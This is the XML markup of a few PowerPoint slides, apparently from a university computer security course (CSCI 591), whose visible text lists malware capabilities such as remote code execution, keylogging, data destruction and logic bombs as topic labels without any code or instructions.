          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" spc="300">
                <a:solidFill>
                  <a:srgbClr val="01A9E7"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" spc="300">
              <a:solidFill>
                <a:srgbClr val="01A9E7"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" spc="300">
              <a:solidFill>
                <a:srgbClr val="01A9E7"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId19"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7430135" y="1438910"/>
            <a:ext cx="508000" cy="322580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" bIns="0" rtlCol="0">
            <a:normAutofit fontScale="80000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" spc="300">
                <a:solidFill>
                  <a:srgbClr val="0097DB"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" spc="300">
              <a:solidFill>
                <a:srgbClr val="0097DB"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" spc="300">
              <a:solidFill>
                <a:srgbClr val="0097DB"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId20"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8952865" y="5756910"/>
            <a:ext cx="508000" cy="322580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" bIns="0" rtlCol="0">
            <a:normAutofit fontScale="80000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" spc="300">
                <a:solidFill>
                  <a:srgbClr val="0084CE"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>05</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" spc="300">
              <a:solidFill>
                <a:srgbClr val="0084CE"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" spc="300">
              <a:solidFill>
                <a:srgbClr val="0084CE"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId21"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2040255" y="4154170"/>
            <a:ext cx="1943100" cy="860425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <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rPr>
              <a:t>Computer reboot</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId22"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3573780" y="2439670"/>
            <a:ext cx="1943100" cy="860425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <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rPr>
              <a:t>File transfer</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId23"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4991100" y="4161790"/>
            <a:ext cx="2233295" cy="860425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <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rPr>
              <a:t>Remote code execution</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId24"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6567805" y="2464435"/>
            <a:ext cx="2233295" cy="860425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <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rPr>
              <a:t>Data destruction</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId25"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8082915" y="4355465"/>
            <a:ext cx="2233295" cy="475615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <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rPr>
              <a:t>Keylogging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑 Light" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId26"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10643235" y="4154170"/>
            <a:ext cx="979170" cy="553085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑 Light" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="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prstClr val="black"/>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rPr>
              <a:t>2023.09.26</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Fangtian</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">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 </a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>Zhong</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:sym typeface="+mn-ea"/>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500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              </a:rPr>
              <a:t>CSCI </a:t>
            </a:r>
            <a:r>
              <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微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              </a:rPr>
              <a:t>591</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="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微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>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微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>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微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>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微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>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微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>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微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886710" y="4955540"/>
            <a:ext cx="6418580" cy="1139825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150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rPr>
              <a:t>Gianforte School of Computing </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微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Norm Asbjornson College of Engineering</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-GB" sz="2200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:sym typeface="+mn-ea"/>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rPr>
              <a:t>E-mail: fangtian.zhong@montana.edu</a:t>
            </a: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a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>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itchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑"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rPr>
              <a:t>logic bombs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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132205" y="1301750"/>
            <a:ext cx="9928225" cy="4780280"/>
            <a:chOff x="998510" y="1183843"/>
            <a:chExt cx="9928225" cy="4780280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 215"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="998510" y="1333068"/>
              <a:ext cx="9928225" cy="4631055"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1245 w 1301"/>
                <a:gd name="T1" fmla="*/ 536 h 536"/>
                <a:gd name="T2" fmla="*/ 56 w 1301"/>
                <a:gd name="T3" fmla="*/ 536 h 536"/>
                <a:gd name="T4" fmla="*/ 0 w 1301"/>
                <a:gd name="T5" fmla="*/ 480 h 536"/>
                <a:gd name="T6" fmla="*/ 0 w 1301"/>
                <a:gd name="T7" fmla="*/ 56 h 536"/>
                <a:gd name="T8" fmla="*/ 56 w 1301"/>
                <a:gd name="T9" fmla="*/ 0 h 536"/>
                <a:gd name="T10" fmla="*/ 119 w 1301"/>
                <a:gd name="T11" fmla="*/ 0 h 536"/>
                <a:gd name="T12" fmla="*/ 119 w 1301"/>
                <a:gd name="T13" fmla="*/ 8 h 536"/>
                <a:gd name="T14" fmla="*/ 56 w 1301"/>
                <a:gd name="T15" fmla="*/ 8 h 536"/>
                <a:gd name="T16" fmla="*/ 8 w 1301"/>
                <a:gd name="T17" fmla="*/ 56 h 536"/>
                <a:gd name="T18" fmla="*/ 8 w 1301"/>
                <a:gd name="T19" fmla="*/ 480 h 536"/>
                <a:gd name="T20" fmla="*/ 56 w 1301"/>
                <a:gd name="T21" fmla="*/ 528 h 536"/>
                <a:gd name="T22" fmla="*/ 1245 w 1301"/>
                <a:gd name="T23" fmla="*/ 528 h 536"/>
                <a:gd name="T24" fmla="*/ 1293 w 1301"/>
                <a:gd name="T25" fmla="*/ 480 h 536"/>
                <a:gd name="T26" fmla="*/ 1293 w 1301"/>
                <a:gd name="T27" fmla="*/ 56 h 536"/>
                <a:gd name="T28" fmla="*/ 1245 w 1301"/>
                <a:gd name="T29" fmla="*/ 8 h 536"/>
                <a:gd name="T30" fmla="*/ 354 w 1301"/>
                <a:gd name="T31" fmla="*/ 8 h 536"/>
                <a:gd name="T32" fmla="*/ 354 w 1301"/>
                <a:gd name="T33" fmla="*/ 0 h 536"/>
                <a:gd name="T34" fmla="*/ 1245 w 1301"/>
                <a:gd name="T35" fmla="*/ 0 h 536"/>
                <a:gd name="T36" fmla="*/ 1301 w 1301"/>
                <a:gd name="T37" fmla="*/ 56 h 536"/>
                <a:gd name="T38" fmla="*/ 1301 w 1301"/>
                <a:gd name="T39" fmla="*/ 480 h 536"/>
                <a:gd name="T40" fmla="*/ 1245 w 1301"/>
                <a:gd name="T41" fmla="*/ 53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1" h="536">
                  <a:moveTo>
                    <a:pt x="1245" y="536"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="536"/>
                    <a:pt x="56" y="536"/>
                    <a:pt x="56" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="536"/>
                    <a:pt x="0" y="511"/>
                    <a:pt x="0" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="56"/>
                    <a:pt x="0" y="56"/>
                    <a:pt x="0" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="25"/>
                    <a:pt x="25" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="0"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="119" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="8"/>
                    <a:pt x="119" y="8"/>
                    <a:pt x="119" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="8"/>
                    <a:pt x="56" y="8"/>
                    <a:pt x="56" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="8"/>
                    <a:pt x="8" y="30"/>
                    <a:pt x="8" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="480"/>
                    <a:pt x="8" y="480"/>
                    <a:pt x="8" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="506"/>
                    <a:pt x="30" y="528"/>
                    <a:pt x="56" y="528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1245" y="528"/>
                    <a:pt x="1245" y="528"/>
                    <a:pt x="1245" y="528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1271" y="528"/>
                    <a:pt x="1293" y="506"/>
                    <a:pt x="1293" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1293" y="56"/>
                    <a:pt x="1293" y="56"/>
                    <a:pt x="1293" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1293" y="30"/>
                    <a:pt x="1271" y="8"/>
                    <a:pt x="1245" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="8"/>
                    <a:pt x="354" y="8"/>
                    <a:pt x="354" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="0"/>
                    <a:pt x="354" y="0"/>
                    <a:pt x="354" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1245" y="0"/>
                    <a:pt x="1245" y="0"/>
                    <a:pt x="1245" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1276" y="0"/>
                    <a:pt x="1301" y="25"/>
                    <a:pt x="1301" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="480"/>
                    <a:pt x="1301" y="480"/>
                    <a:pt x="1301" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="511"/>
                    <a:pt x="1276" y="536"/>
                    <a:pt x="1245" y="53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9" name="Rectangle 216"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1768736" y="1481527"/>
              <a:ext cx="38164" cy="28450"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:pr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1" name="Rectangle 218"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3560379" y="1481527"/>
              <a:ext cx="40940" cy="28450"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:pr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3" name="Freeform 219"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1872127" y="1278214"/>
              <a:ext cx="179719" cy="191517"/>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6 h 28"/>
                <a:gd name="T12" fmla="*/ 6 w 28"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 14 w 28"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 22 w 28"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 14 w 28"/>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6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="6" y="10"/>
                    <a:pt x="6" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="14" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="22"/>
                    <a:pt x="22" y="19"/>
                    <a:pt x="22" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="10"/>
                    <a:pt x="19" y="6"/>
                    <a:pt x="14"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4" name="Freeform 220"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2215606" y="1278214"/>
              <a:ext cx="185271" cy="191517"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 15 w 29"/>
                <a:gd name="T1" fmla="*/ 28 h 28"/>
                <a:gd name="T2" fmla="*/ 0 w 29"/>
                <a:gd name="T3" fmla="*/ 14 h 28"/>
                <a:gd name="T4" fmla="*/ 15 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 28"/>
                <a:gd name="T6" fmla="*/ 29 w 29"/>
                <a:gd name="T7" fmla="*/ 14 h 28"/>
                <a:gd name="T8" fmla="*/ 15 w 29"/>
                <a:gd name="T9" fmla="*/ 28 h 28"/>
                <a:gd name="T10" fmla="*/ 15 w 29"/>
                <a:gd name="T11" fmla="*/ 6 h 28"/>
                <a:gd name="T12" fmla="*/ 7 w 29"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 15 w 29"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 23 w 29"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 15 w 29"/>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15" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="28"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="6"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="0"/>
                    <a:pt x="29" y="6"/>
                    <a:pt x="29" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="22"/>
                    <a:pt x="23" y="28"/>
                    <a:pt x="15" y="28"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="15" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="7" y="10"/>
                    <a:pt x="7" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="15" y="22"/>
